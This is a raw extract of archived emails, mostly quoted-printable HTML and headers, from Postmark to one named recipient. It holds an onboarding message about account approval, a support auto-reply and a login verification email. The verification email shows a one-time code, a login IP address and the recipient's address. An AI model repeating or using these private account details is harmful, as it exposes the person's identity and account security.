style=3D"padding:0;Margin:0"><table cellpadding=3D"0" cellspac= ing=3D"0" width=3D"100%" role=3D"none" style=3D"mso-table-lspace:0pt;mso-ta= ble-rspace:0pt;border-collapse:collapse;border-spacing:0px"><tr><td align= =3D"center" valign=3D"top" style=3D"padding:0;Margin:0;width:600px"><table = cellpadding=3D"0" cellspacing=3D"0" width=3D"100%" role=3D"presentation" st= yle=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;b= order-spacing:0px"><tr><td align=3D"left"=0Abgcolor=3D"#ffffff" style=3D"pa= dding:0;Margin:0;padding-left:30px;padding-right:30px"><p style=3D"Margin:0= ;-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-ru= le:exactly;font-family:georgia, times, 'times new roman', serif;line-height= :24px;color:#353942;font-size:16px"><strong>Why do I have to request approv= al?</strong></p>=0A=0A<p style=3D"Margin:0;-webkit-text-size-adjust:none;-m= s-text-size-adjust:none;mso-line-height-rule:exactly;font-family:georgia, t= imes, 'times new roman', serif;line-height:24px;color:#353942;font-size:16p= x">One thing you should know about Postmark is that we take email delivery = and our sending reputation seriously. <em>Really</em> seriously. One reason= why Postmark=E2=80=99s delivery rates are better than what you see with ot= her providers is that we have a rigorous no-spam policy.=C2=A0</p>=0A<p sty= le=3D"Margin:0;-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-= line-height-rule:exactly;font-family:georgia, times, 'times new roman', ser= if;line-height:24px;color:#353942;font-size:16px"><br></p>=0A=0A<p style=3D= "Margin:0;-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-= height-rule:exactly;font-family:georgia, times, 'times new roman', serif;li= ne-height:24px;color:#353942;font-size:16px">We=E2=80=99ve got lots of clev= er systems in place to catch bad actors, and one of the most effective ones= is a human review of each new Postmark customer. We know filling out quest= ionnaires isn=E2=80=99t <em>fun, </em>but this one is brief=E2=80=94and we= =E2=80=99ll review your request quickly and get you sending right away. <a = href=3D"https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=3DaHR0= cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZzdXBwb3J0JTJGYXJ0aWNsZSUyRjEwODQtaG9= 3LWRvZXMtdGhlLWFjY291bnQtYXBwcm92YWwtcHJvY2Vzcy13b3JrJTNGdXRtX3NvdXJjZSUzRG= FjdGl2ZWhvc3RlZCUyNnV0bV9tZWRpdW0lM0RlbWFpbCUyNnV0bV9jYW1wYWlnbiUzRHBtXzIwM= jMwN19vbmJvYXJkaW5nLXYxX2Uy&sig=3DHpbnMdVV3L8EPnPZa3zv2a1AB67JwdG4kBrSG1VMX= gRF&iat=3D1727529326&a=3D%7C%7C477586617%7C%7C&account=3Dpostmark%2Eactiveh= osted%2Ecom&email=3DZXxUqEYF%2BZ91GhfTCVXXqRztC3f9CFY7h8vrQC58Li7YiMZcE3%2F= cz%2BcTA2XA3ffJauhqWg%3D%3D%3A8Nb2%2B6Ctv49oV9LxEqNBZeFhBgdM8zSH&s=3D83f3d2= f8c2e1fe9a4fb88e34e59f8c08&i=3D57A90A3A258" target=3D"_blank"=0Astyle=3D"-w= ebkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:= exactly;text-decoration:underline;color:#0070CC;font-size:16px">Learn more = about Postmark=E2=80=99s approval process.=C2=A0</a></p>=0A=0A<p style=3D"M= argin:0;-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-he= ight-rule:exactly;font-family:georgia, times, 'times new roman', serif;line= -height:24px;color:#353942;font-size:16px"><br></p>=0A<p style=3D"Margin:0;= -webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rul= e:exactly;font-family:georgia, times, 'times new roman', serif;line-height:= 24px;color:#353942;font-size:16px">If you have any questions, just reply to= this email. We=E2=80=99re always here to help!</p>=0A</td>=0A</tr>=0A<tr><= td align=3D"center" height=3D"30" style=3D"padding:0;Margin:0"></td>=0A</tr= >=0A</table>=0A</td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>=0A</td>= =0A</tr>=0A</table>=0A=0A <table cellpadding=3D"0" cellspacing=3D"0" class= =3D"es-content" align=3D"center" role=3D"none" style=3D"mso-table-lspace:0p= t;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px;table-la= yout:fixed !important;width:100%"><tr><td align=3D"center" style=3D"padding= :0;Margin:0"><table class=3D"es-content-body" align=3D"center" cellpadding= =3D"0" cellspacing=3D"0" bgcolor=3D"#ffffff" role=3D"none" style=3D"mso-tab= le-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:= 0px;background-color:#FFFFFF;width:600px"><tr><td align=3D"left" style=3D"p= adding:0;Margin:0"><table cellpadding=3D"0" cellspacing=3D"0" width=3D"100%= " role=3D"none" style=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-c= ollapse:collapse;border-spacing:0px"><tr><td align=3D"center" valign=3D"top= " style=3D"padding:0;Margin:0;width:600px"><table cellpadding=3D"0" cellspa= cing=3D"0" width=3D"100%" role=3D"presentation" style=3D"mso-table-lspace:0= pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px"><tr><t= d align=3D"center"=0Aheight=3D"30" style=3D"padding:0;Margin:0"></td>=0A=0A= </tr>=0A<tr><td align=3D"center" height=3D"6" bgcolor=3D"#FFDE00" style=3D= "padding:0;Margin:0"></td>=0A</tr>=0A<tr><td align=3D"center" height=3D"30"= style=3D"padding:0;Margin:0"></td>=0A</tr>=0A<tr><td align=3D"left" bgcolo= r=3D"#ffffff" style=3D"padding:0;Margin:0;padding-left:30px;padding-right:3= 0px"><p style=3D"Margin:0;-webkit-text-size-adjust:none;-ms-text-size-adjus= t:none;mso-line-height-rule:exactly;font-family:georgia, times, 'times new = roman', serif;line-height:29px;color:#353942;font-size:16px"><strong><span = style=3D"font-size:19px">Learn more about Postmark's stellar email delivery= </span><br><br>We never ever mix transactional and promotional emails</stro= ng></p>=0A=0A<p style=3D"Margin:0;-webkit-text-size-adjust:none;-ms-text-si= ze-adjust:none;mso-line-height-rule:exactly;font-family:georgia, times, 'ti= mes new roman', serif;line-height:24px;color:#353942;font-size:16px">To pro= tect the delivery of your transactional emails, it=E2=80=99s crucial to sep= arate them from your bulk or promotional emails. With Postmark=E2=80=99s Me= ssage Streams, that=E2=80=99s a piece of cake. <a href=3D"https://postmark.= lt.emlnk1.com/Prod/link-tracker?redirectUrl=3DaHR0cHMlM0ElMkYlMkZwb3N0bWFya= 2FwcC5jb20lMkZtZXNzYWdlLXN0cmVhbXMlM0Z1dG1fc291cmNlJTNEYWN0aXZlaG9zdGVkJTI2= dXRtX21lZGl1bSUzRGVtYWlsJTI2dXRtX2NhbXBhaWduJTNEcG1fMjAyMzA3X29uYm9hcmRpbmc= tdjFfZTI=3D&sig=3DGr2aeTtXK7gY1gLGnjyPCJL4AyYan4EqY3YZjwmcvaMT&iat=3D172752= 9326&a=3D%7C%7C477586617%7C%7C&account=3Dpostmark%2Eactivehosted%2Ecom&emai= l=3DZXxUqEYF%2BZ91GhfTCVXXqRztC3f9CFY7h8vrQC58Li7YiMZcE3%2Fcz%2BcTA2XA3ffJa= uhqWg%3D%3D%3A8Nb2%2B6Ctv49oV9LxEqNBZeFhBgdM8zSH&s=3D83f3d2f8c2e1fe9a4fb88e= 34e59f8c08&i=3D57A90A3A259" target=3D"_blank" style=3D"-webkit-text-size-ad= just:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;text-decor= ation:underline;color:#0070CC;font-size:16px">Learn more.</a><br><br></p>= =0A=0A<p style=3D"Margin:0;-webkit-text-size-adjust:none;-ms-text-size-adju= st:none;mso-line-height-rule:exactly;font-family:georgia, times, 'times new= roman', serif;line-height:24px;color:#353942;font-size:16px"><strong>Trans= actional time to inbox</strong></p>=0A<p style=3D"Margin:0;-webkit-text-siz= e-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;font-f= amily:georgia, times, 'times new roman', serif;line-height:24px;color:#3539= 42;font-size:16px">We don=E2=80=99t just claim great delivery. We publicly = share our email delivery metrics for transactional email. <a href=3D"https:= //postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=3DaHR0cHMlM0ElMkYlMk= Z0dGkucG9zdG1hcmthcHAuY29tJTNGdXRtX3NvdXJjZSUzRGFjdGl2ZWhvc3RlZCUyNnV0bV9tZ= WRpdW0lM0RlbWFpbCUyNnV0bV9jYW1wYWlnbiUzRHBtXzIwMjMwN19vbmJvYXJkaW5nLXYxX2Uy= &sig=3DLPsZqfDojxgmQUVk1Fo645hGFJhBi4q249ftDbprMJ4&iat=3D1727529326&a=3D%7C= %7C477586617%7C%7C&account=3Dpostmark%2Eactivehosted%2Ecom&email=3DZXxUqEYF= %2BZ91GhfTCVXXqRztC3f9CFY7h8vrQC58Li7YiMZcE3%2Fcz%2BcTA2XA3ffJauhqWg%3D%3D%= 3A8Nb2%2B6Ctv49oV9LxEqNBZeFhBgdM8zSH&s=3D83f3d2f8c2e1fe9a4fb88e34e59f8c08&i= =3D57A90A3A262" target=3D"_blank" style=3D"-webkit-text-size-adjust:none;-m= s-text-size-adjust:none;mso-line-height-rule:exactly;text-decoration:underl= ine;color:#0070CC;font-size:16px">View our time to inbox here</a>.=C2=A0</p= >=0A</td>=0A</tr>=0A=0A <tr><td align=3D"center" height=3D"40" style=3D"pad= ding:0;Margin:0"></td>=0A</tr>=0A<tr><td align=3D"center" height=3D"20" bgc= olor=3D"#f5f3ec" style=3D"padding:0;Margin:0"></td>=0A</tr>=0A</table>=0A</= td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table= >=0A=0A <table cellpadding=3D"0" cellspacing=3D"0" class=3D"es-footer" alig= n=3D"center" role=3D"none" style=3D"mso-table-lspace:0pt;mso-table-rspace:0= pt;border-collapse:collapse;border-spacing:0px;table-layout:fixed !importan= t;width:100%;background-color:transparent;background-repeat:repeat;backgrou= nd-position:center top"><tr><td align=3D"center" style=3D"padding:0;Margin:= 0"><table class=3D"es-footer-body" align=3D"center" cellpadding=3D"0" cells= pacing=3D"0" style=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-coll= apse:collapse;border-spacing:0px;background-color:transparent;width:600px" = bgcolor=3D"#FFFFFF" role=3D"none"><tr><td align=3D"left" style=3D"padding:0= ;Margin:0;padding-left:30px;padding-right:30px"><table cellpadding=3D"0" ce= llspacing=3D"0" width=3D"100%" role=3D"none" style=3D"mso-table-lspace:0pt;= mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px"><tr><td a= lign=3D"center" valign=3D"top" style=3D"padding:0;Margin:0;width:540px"><ta= ble cellpadding=3D"0" cellspacing=3D"0" width=3D"100%"=0Arole=3D"presentati= on" style=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:coll= apse;border-spacing:0px"><tr><td align=3D"center" style=3D"padding:0;Margin= :0"><p style=3D"Margin:0;-webkit-text-size-adjust:none;-ms-text-size-adjust= :none;mso-line-height-rule:exactly;font-family:georgia, times, 'times new r= oman', serif;line-height:18px;color:#a9a696;font-size:12px">Postmark, 1 Nor= th Dearborn St, 5th floor, Chicago, IL 60602, United States<br><a href=3D"h= ttps://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=3DaHR0cHMlM0ElM= kYlMkZwb3N0bWFyay5hY3RpdmVob3N0ZWQuY29tJTJGcF92LnBocCUzRmwlM0QzJTI2YyUzRDU3= JTI2bSUzRDkwJTI2cyUzRDgzZjNkMmY4YzJlMWZlOWE0ZmI4OGUzNGU1OWY4YzA4&sig=3DGwqE= 2KuZrSjJbqv4uBpFX5zLKTrqUhzGFLt7tKwdTak5&iat=3D1727529326&a=3D%7C%7C4775866= 17%7C%7C&account=3Dpostmark%2Eactivehosted%2Ecom&email=3DZXxUqEYF%2BZ91GhfT= CVXXqRztC3f9CFY7h8vrQC58Li7YiMZcE3%2Fcz%2BcTA2XA3ffJauhqWg%3D%3D%3A8Nb2%2B6= Ctv49oV9LxEqNBZeFhBgdM8zSH&s=3D83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=3D57A90A3= A244" target=3D"_blank" style=3D"-webkit-text-size-adjust:none;-ms-text-siz= e-adjust:none;mso-line-height-rule:exactly;text-decoration:underline;color:= #a9a696;font-size:12px">Read this online</a>=C2=A0=E2=80=93=C2=A0<a=0Ahref= =3D"https://postmark.activehosted.com/proc.php?nl=3D3&c=3D57&m=3D90&s=3D83f= 3d2f8c2e1fe9a4fb88e34e59f8c08&act=3Dunsub&runid=3D606393" target=3D"_blank"= style=3D"-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-= height-rule:exactly;text-decoration:underline;color:#a9a696;font-size:12px"= >Unsubscribe</a></p>=0A=0A</td>=0A</tr>=0A<tr><td align=3D"center" height= =3D"20" bgcolor=3D"#f5f3ec" style=3D"padding:0;Margin:0"></td>=0A</tr>=0A</= table>=0A</td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>=0A</td>=0A</tr= >=0A</table>=0A</td>=0A</tr>=0A</table>=0A<img src=3D"https://postmark.lt.e= mlnk1.com/Prod/link-tracker?nl=3D3&c=3D57&m=3D90&s=3D83f3d2f8c2e1fe9a4fb88e= 34e59f8c08&l=3Dopen&account=3Dpostmark.activehosted.com&a=3D477586617" bord= er=3D"0" width=3D"1" height=3D"1" style=3D"display:block;width:1px!importan= t;min-width:1px!important;max-width:1px!important;height:1px!important;bord= er:0;overflow:hidden;" /><br /><br clear=3D"all" /></body>=0A</html> --_=_swift-125849113966f8016dc6a6b3.80717975_=_-- PK }��Yѭ�-� � A 1728323227.M372190P1315802.mgh-web11.maghost.ro,S=7047,W=7197:2,Snu ��٘� Return-Path: <support@postmarkapp.com> Delivered-To: rudolph.perry@bloomingcostamices.com Received: from mgh-web11.maghost.ro by mgh-web11.maghost.ro with LMTP id KIcYFZseBGfaExQAJwI5NA (envelope-from <support@postmarkapp.com>) for <rudolph.perry@bloomingcostamices.com>; Mon, 07 Oct 2024 20:47:07 +0300 Return-path: <support@postmarkapp.com> Envelope-to: rudolph.perry@bloomingcostamices.com Delivery-date: Mon, 07 Oct 2024 20:47:07 +0300 Received: from mail-lf1-f45.google.com ([209.85.167.45]:55352) by mgh-web11.maghost.ro with esmtps (TLS1.3) tls TLS_AES_128_GCM_SHA256 (Exim 4.97.1) (envelope-from <support@postmarkapp.com>) id 1sxrp3-00000005WIX-33Zc for rudolph.perry@bloomingcostamices.com; Mon, 07 Oct 2024 20:47:07 +0300 Received: by mail-lf1-f45.google.com with SMTP id 2adb3069b0e04-539908f238fso5275881e87.2 for <rudolph.perry@bloomingcostamices.com>; Mon, 07 Oct 2024 10:46:44 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=postmarkapp.com; s=google; t=1728323184; x=1728927984; darn=bloomingcostamices.com; h=to:subject:message-id:date:auto-submitted:mime-version:from:from:to :cc:subject:date:message-id:reply-to; bh=GTujkQaCd9gWFILIvKINZ2tw1ec2LfeG4ov+DM6FYYU=; b=Sg9wbxzFw6y7It6hqbz0waJt8ChquBqUENJEw7aI7T9pXAwf3GOZc1ju6oC1MQ/1Sa X8AlmTogMCsfcd5bfmJGSuvuoE0GXXFET8EUJhWOGoZnP7aYqThT2fxYmrCe/2tw0wkj 9Kr/5P2xRR+dt9pMoDxLz5SnCF2aKwbgBGStI= X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20230601; t=1728323184; x=1728927984; h=to:subject:message-id:date:auto-submitted:mime-version:from :x-gm-message-state:from:to:cc:subject:date:message-id:reply-to; bh=GTujkQaCd9gWFILIvKINZ2tw1ec2LfeG4ov+DM6FYYU=; b=iqxBT31Hwm/tIyfTH2sEe77nQ2gqkhydj4oV50h7ulweOM2yM/0OiTWQ2l9bTPgoCx Xm5JHlBwcVE0gwVBh7tIiNP/KOxtSK7E+tyBSXFlhxtbBXtnStv7tyvNWiF7Qkcq8WGp hfWZcnmIC2dK0QZws+perd/SXNnQAJtDJBWK6dN7E1jn/r2ZO2fh+UZZlAIhn8QQHqbg w0ShkCuoh+A77oDC+J9WyFMI8UVnkpjAIBl+3I6R7pjWFaaSxtq/QEvcwbKjk2x4Gyr4 25VDyydJ7tHoQbLan8WtgsO50CsSjVfoqoOb0e05pJG0lB6aHoCcPhezlFgJ1De1f/QL 9OxQ== X-Gm-Message-State: AOJu0YzqOTl5z1ofmBdGSMCgWeCEFJoQd1hyCCM7hodROqgfTv9Knz/D y1ShKoorcX/loj0GDc1tc/RPiSQ9SFUj4MSkPLb+6bM8YctJiMQWNQx8PwCktDLb978UL4J/xW1 Ffm0zj+yYctdWxyGfkfnqwePkkKmi3/W0TI6PhlInKWCB2gnk X-Google-Smtp-Source: AGHT+IHHLqREpY8arpUTSDwE7dsmlG2ezLx4e5H64rQCT6ENsfNM5Osqb0CiASXvPN4npnUOA4Soa41aWtAIragqbxg= X-Received: by 2002:a05:6512:3b8e:b0:537:a855:7d6f with SMTP id 2adb3069b0e04-539ab891f52mr6544401e87.34.1728323183500; Mon, 07 Oct 2024 10:46:23 -0700 (PDT) Received: from 545145119934 named unknown by gmailapi.google.com with HTTPREST; Mon, 7 Oct 2024 10:46:23 -0700 From: Postmark Support <support@postmarkapp.com> MIME-Version: 1.0 X-Report-Abuse: Please forward a copy of this message, including all headers, to abuse@helpscout.net X-Msg-Context: HS-2-51370-2728045395-8226784715 X-Hs-State: 3 X-Hs-Origin: pconsumer-0b27cf44f61106251 [f660256f1c] X-Hs-Message-Id: reply-32552-2728045395-8226784715-1728323182-120832077@helpscout.net X-Hs-Cid: 32552 Auto-Submitted: auto-replied Date: Mon, 7 Oct 2024 10:46:23 -0700 Message-ID: <CAAiZHCGfX=mt9anbq2sCdJQ2PdRohLOXi6AC20uA+_GtLqkipg@mail.gmail.com> Subject: Re: account approval To: "Rudolph.Perry" <rudolph.perry@bloomingcostamices.com> Content-Type: multipart/alternative; boundary="00000000000068fd470623e6990c" X-Spam-Status: No, score=-0.2 X-Spam-Score: -1 X-Spam-Bar: / X-Ham-Report: Spam detection software, running on the system "mgh-web11.maghost.ro", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: We’ve received your message! Our support hours are Monday through Friday, 3am to 7pm US Eastern Time. While you wait, there may be something in our Help Articles <https://postmarkapp.com/support> and API Docs <https://postmarkapp.com/developer> that can help you right away, check it out! If you’re c [...] Content analysis details: (-0.2 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- -0.0 SPF_PASS SPF: sender matches SPF record -0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's domain 0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid -0.1 DKIM_VALID_EF Message has a valid DKIM or DK signature from envelope-from domain -0.1 DKIM_VALID Message has at least one valid DKIM or DK signature 0.0 HTML_FONT_LOW_CONTRAST BODY: HTML font color similar or identical to background 0.0 HTML_MESSAGE BODY: HTML included in message X-Spam-Flag: NO --00000000000068fd470623e6990c Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: quoted-printable We=E2=80=99ve received your message! Our support hours are Monday through Friday, 3am to 7pm US Eastern Time. While you wait, there may be something in our Help Articles <https://postmarkapp.com/support> and API Docs <https://postmarkapp.com/developer> that can help you right away, check it out! If you=E2=80=99re catching us outside of our support hours, we promise= to get back to you as soon as possible. We also promise that we=E2=80=99re monitoring Postmark 24 hours a day, 365 = days a year. If there is a global service interruption, we=E2=80=99re on it. Thank= you for your patience! Postmark Support {#HS:2728045395-870882#} --00000000000068fd470623e6990c Content-Type: text/html; charset="UTF-8" Content-Transfer-Encoding: quoted-printable <html lang=3D"en"> <head> <meta content=3D"text/html; charset=3Dutf-8" http-equiv=3D"Content-Type"> </head> <body bgcolor=3D"#ffffff"> <div id=3D"hsReplyAbove" class=3D"hsReplyAbove"> <div style=3D"font-family:sans-serif"> <div>We=E2=80=99ve received your message!<br> <br> Our support hours are Monday through Friday, 3am to 7pm US Eastern Time.=C2= =A0=C2=A0<br> <br> While you wait, there may be something in our=20 <a href=3D"https://postmarkapp.com/support">Help Articles</a> and <a href= =3D"https://postmarkapp.com/developer">API Docs</a> that can help you right= away, check it out! If you=E2=80=99re catching us outside of our support h= ours, we promise to get back to you as soon as possible.<br> <br> We also promise that we=E2=80=99re monitoring Postmark 24 hours a day, 365 = days a year. If there is a global service interruption, we=E2=80=99re on it= . Thank you for your patience! <br> <br> Postmark Support</div> </div> </div> <span height=3D"0" style=3D"font-size:0px;height:0px;line-height:0px;color= :#ffffff" id=3D"hsContentRef">{#HS:2728045395-870882#}</span> </body> </html> --00000000000068fd470623e6990c-- PK }��Y�H![R^ R^ C 1729063165.M602515P1734023.mgh-web11.maghost.ro,S=24146,W=24839:2,Snu ��٘� Return-Path: <pm_bounces@pmbounces.postmarkapp.com> Delivered-To: rudolph.perry@bloomingcostamices.com Received: from mgh-web11.maghost.ro by mgh-web11.maghost.ro with LMTP id IHXjIv1oD2eHdRoAJwI5NA (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) for <rudolph.perry@bloomingcostamices.com>; Wed, 16 Oct 2024 10:19:25 +0300 Return-path: <pm_bounces@pmbounces.postmarkapp.com> Envelope-to: rudolph.perry@bloomingcostamices.com Delivery-date: Wed, 16 Oct 2024 10:19:25 +0300 Received: from sc-ord-mta121.mtasv.net ([50.31.156.121]:41111) by mgh-web11.maghost.ro with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384 (Exim 4.97.1) (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) id 1t0yJX-00000007H2w-49Yo for rudolph.perry@bloomingcostamices.com; Wed, 16 Oct 2024 10:19:25 +0300 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; s=pm20241004; d=pm.mtasv.net; h=From:Date:Subject:To:Message-Id:MIME-Version:Content-Type:Date:From: Message-ID:Reply-To:Sender:Subject:To:CC; t=1729063162; x=1729149562; bh=5zt8ZC6Rsmliz0pNeK9SCT7cMRvXTRkWCSph8xEajEY=; b=hc17mWkQ6WMvIbfsB9Ot6nhYY2OuMrGBXP15UHCjb7I2v2zm7V5eZV328+I7QRw76bSh0l/BMt9a tKJAK84x7RGEyFnCrAwav1MgDTbTW/HNBnceAEDbiQXEhXj3mX7eLy1XM2Xxe4s8gUjqBBjVkyme 2D4uV9oX9HpqkFmO9lyqm2TsHvBHJBD3MGbFL61PyfK1qmKVfipoSv3zv94nYkHXv/kZRoYiYb8q RaKQiBePeoT6aLYv+R2bysvshNaeUYTQiOwLKjZ1VsJ9lkEGJsGC94f9A61HGQTx+73t1dJfLvXy 4RaR7UhPovusVQLRwbSrtEgYgStVIaoIfwgA5Q== Received: by sc-ord-mta121.mtasv.net id h1tkd23864o7 for <rudolph.perry@bloomingcostamices.com>; Wed, 16 Oct 2024 03:18:39 -0400 (envelope-from <pm_bounces@pmbounces.postmarkapp.com>) X-PM-IP: 50.31.156.121 X-IADB-IP: 50.31.156.121 X-IADB-IP-REVERSE: 121.156.31.50 DKIM-Signature: v=1; a=rsa-sha256; d=postmarkapp.com; s=20240110170422pm; c=relaxed/relaxed; i=support@postmarkapp.com; t=1729063119; x=1729235919; h=date:date:from:from:message-id:reply-to:sender:subject:subject:to:to:cc: feedback-id:mime-version:content-type; bh=5zt8ZC6Rsmliz0pNeK9SCT7cMRvXTRkWCSph8xEajEY=; b=QOM6RekDZOz4Pbgm60hJeNrYjqk2S2WBbj7Mr8WysvFbFFtcDgvxkyedtjFTUq8/KqTZZV/0yei 3Da3kRSdugsQDOpZTh49V5tFcEGWNJZMsrphTEnjOc0SjCPcL7mWl0D2YHdH/KnWDb1vixkOC4SBQ bWWDEOMhvdhYggaeK0I= From: Postmark <support@postmarkapp.com> Date: Wed, 16 Oct 2024 07:18:39 +0000 Subject: Your Postmark verification code is 371198 To: rudolph.perry@bloomingcostamices.com Message-Id: <670f68cfa7c8c_319320a583499@ip-172-26-21-162.us-east-2.compute.internal.mail> Feedback-ID: s40483-bG9naW4tdmVyaWZpY2F0aW9uLWNvZGU=:s40483:a50355:postmark X-Complaints-To: abuse@postmarkapp.com X-PM-Message-Id: cfceff43-7f6a-493b-8202-9ad9f814ca5c X-PM-Tag: login-verification-code X-PM-RCPT: |bTB8NTAzNTV8NDA0ODN8cnVkb2xwaC5wZXJyeUBibG9vbWluZ2Nvc3RhbWljZXMuY29t| X-PM-Message-Options: v1;1.v2rlGsu5FDQnqN-n40TCcQ.ZebSxlRwQ4fbLZf0Tu8sV8dii3_GKLmrY6IQ_jhn8zOQzQgDadnDB-gDNlVQW6vNCWftTZr1ORLWbCHXJH3KtQCcETefIQiyd3kMLfz8Zupwm-X13nX-JDWb_bTX9qu-uwYmCUn6rO8d86JAtLFiJF5cV0UiMmTkXTAPrFfnU0ee0uD0MYUVbJpcE-hJHwhS6HBJPq-6SKwxz6vysu9ghQ MIME-Version: 1.0 X-PM-MTA-Pool: transactional-1 Content-Type: multipart/alternative; boundary=mk3-570f04f0730748b99d196381d7f6d509; charset=UTF-8 X-Spam-Status: No, score=0.3 X-Spam-Score: 3 X-Spam-Bar: / X-Ham-Report: Spam detection software, running on the system "mgh-web11.maghost.ro", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: Hi Rudolph.Perry, We noticed someone just tried to log in to your Postmark account. If this was you, please use the following code to confirm it: 371198 Content analysis details: (0.3 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- -0.0 SPF_HELO_PASS SPF: HELO matches SPF record -0.0 SPF_PASS SPF: sender matches SPF record 0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid -0.1 DKIM_VALID Message has at least one valid DKIM or DK signature -0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's domain 0.0 HTML_MESSAGE BODY: HTML included in message 0.5 KAM_NUMSUBJECT Subject ends in numbers excluding current years -0.1 DKIMWL_WL_HIGH DKIMwl.org - High trust sender X-Spam-Flag: NO --mk3-570f04f0730748b99d196381d7f6d509 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Hi Rudolph.Perry, We noticed someone just tried to log in to your Postmark account. If this w= as you, please use the following code to confirm it: 371198 This code is valid for 10 minutes. LOGIN DETAILS: * Time: 2024-10-16 07:18:39 UTC * IP: 223.233.69.100 --- DON=E2=80=99T RECOGNIZE THIS ACTIVITY? If you didn=E2=80=99t initiate the login above, please change your password= immediately: https://account.postmarkapp.com/password_resets/new Turn on two-factor authentication on your account: https://postmarkapp.com/support/article/1081-how-do-i-use-two-factor-authen= tication-2fa If you need any help, just reply to this email. Postmark Team https://postmarkapp.com/support Follow us for the latest updates: http://twitter.com/postmarkapp --mk3-570f04f0730748b99d196381d7f6d509 Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.= w3.org/TR/html4/loose.dtd"> <html lang=3D"en" style=3D"color-scheme: light dark; supported-color-scheme= s: light dark;"> <head> <meta name=3D"viewport" content=3D"width=3Ddevice-width, initial-scale=3D= 1.0"> <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3DUTF-8"> <meta name=3D"x-apple-disable-message-reformatting"> <meta name=3D"color-scheme" content=3D"light dark"> <meta name=3D"supported-color-schemes" content=3D"light dark"> =20 =20 <style>.ExternalClass { width: 100%; } .ExternalClass { line-height: 100%; } body { width: 100% !important; height: 100%; margin: 0; background-color: #eeece4;= color: #272727; line-height: 1.6; -webkit-text-size-adjust: none; } a:visited { color: #007bc8; text-decoration: underline; } a:visited img { border: none; } .btn:visited { border-color: #007bc8; border-style: solid; border-width: 10px 18px; backgr= ound-color: #007bc8; font-size: 14px; display: inline-block; height: auto; = border-radius: 3px; color: #fff; font-weight: 700; text-align: center; text= -decoration: none; -webkit-text-size-adjust: none; } .btn:visited--s { border-width: 5px 9px; } .btn--ghost:visited { border-color: #deeef8; border-style: solid; border-width: 10px 18px; backgr= ound-color: #deeef8; font-size: 14px; display: inline-block; height: auto; = border-radius: 3px; color: #007bc8; text-align: center; text-decoration: no= ne; -webkit-text-size-adjust: none; } .footer--slim a:visited { color: #b0aea7; } .follow-banner a:visited { color: #272727; } .digest a:hover { color: #000 !important; } @media screen and (prefers-color-scheme:dark) { body { background-color: #111 !important; } .spacer { background-color: #272727 !important; color: transparent !important; } .txt-warning { color: #fa9552 !important; } .txt-danger { color: #fb9186 !important; } .email-wrapper { background-color: #111 !important; } .btn { color: #ececec !important; } .btn:visited { color: #ececec !important; } h1 { color: #fff !important; } h2 { color: #fff !important; } h3 { color: #fff !important; } li { color: #ececec !important; } ol { color: #ececec !important; } p { color: #ececec !important; } ul { color: #ececec !important; } .one-time-code { color: #fff !important; } .welcome { background-color: #272727 !important; } .divider_line { border-color: #5a5a5a !important; } .divider { background-color: #272727 !important; } .purchase { border-color: #5a5a5a !important; } .purchase td { border-color: #5a5a5a !important; } .cta-banner--dmarcdigests { border-top-color: #5a5a5a !important; } .cta-banner { background-color: #272727 !important; } .footer { background-color: #111 !important; } .footer--slim p { color: #5a5a5a !important; } .footer--slim a { color: #5a5a5a !important; } .footer--slim a:visited { color: #5a5a5a !important; } .follow-banner { filter: brightness(.9) !important; } .header--filled { filter: brightness(.9) !important; } .header--error { background-color: #ffb3aa !important; } .header--digest { border-bottom-color: #5a5a5a !important; background-color: #272727 !imp= ortant; } .header--digest .header_logo img { filter: invert(1) !important; } .panel--warning { border-color: #847450 !important; background: #34311a !important; 